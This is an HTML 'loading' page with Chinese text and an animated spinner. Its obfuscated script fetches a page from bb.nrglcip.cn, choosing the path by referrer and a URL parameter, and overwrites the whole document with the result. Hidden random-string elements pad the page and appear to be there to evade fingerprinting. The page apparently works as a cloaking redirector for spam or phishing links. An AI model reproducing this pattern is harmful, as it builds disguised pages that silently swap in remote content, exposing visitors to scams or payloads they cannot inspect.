<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .aVYKcUQ {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .aVYKcUQ .rcikeNqLHom {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .aVYKcUQ .content {
            line-height: 50px;
            text-align: center
        }

        .aVYKcUQ .img {
            width: 100%
        }

        .aVYKcUQ .zFvntGDOEcj {
            text-align: center
        }

        .aVYKcUQ .zFvntGDOEcj span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .aVYKcUQ .zFvntGDOEcj span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .aVYKcUQ .zFvntGDOEcj span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .aVYKcUQ .zFvntGDOEcj span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .aVYKcUQ .zFvntGDOEcj span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .aVYKcUQ .zFvntGDOEcj span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .aVYKcUQ .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function uoSCmz6dnsia(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var TpEeS3 = uoSCmz6dnsia('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ TpEeS3 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ TpEeS3 +".html?a=share";
		}
		
        GanQir9IG=url+"#"+new Date().getTime();
        GanQir9IG && function() {
            $.get(GanQir9IG, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<b style='display:none' >kX4pFBt2MXvLtxgJQS9roGtUpzUKdwx8skEhRR2QZCdTw2gn2PyImwEFCN4q1xDLwcY7GgkV</b>
<li style='display:none' >ln2AzPXyNlYyK2H6KNl9F3k1n7RTOXe2zbywL1P3Vtn4Ap7S4E0Ks2Q2BAYO4eESTTT0DJFksyqAy8XWrKWyds0L3BIDxDs</li>
<div style='display:none'>cKaJyS7PmuOhXEmb1S0XIySlcE8gyCvrSeqri9wfzS2kX4TUJteISEagLZi79Ocxhg48Jsud1G2JPX6cC6m3nI9MSihM7g9</div><div class="aVYKcUQ">
    <div class="rcikeNqLHom">
        <div class="zFvntGDOEcj">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<ul style='display:none' >Ucm6lOmKxE679lrmXrR32T5jhi8lO8ElcO3XhcjwuCLJVhDinJGg1x2X3MTWmKNsnPiJhHvrjMVJMsvkJp0FGH</ul>
<span style='display:none'>BRE1b0AHrYD3JIFfhI8QlfFWyXy1qT2StU06ga</span>
<b style='display:none' >Vu8HxuniDMuyndYd7tlT</b>
<li style='display:none' >JbkLxiW1E6qsg7uDDT7M0IocRXohF50gDbNTGIkO5bjAC8qxwVr8v3IbFqb6RKZ0r1rR8ppv5iaOD6jNHo4zo8hnL</li>
<span style='display:none'>BRE1b0AHrYD3JIFfhI8QlfFWyXy1qT2StU06ga</span>
<a  href='#' style='display:none'>IuKXA72rGYGnGxaVoFGGot0vmKI3vVrHdPcUfDvl9FvnFES2nnKCLGYMRNDMfYKBx2H</a></body>
</html>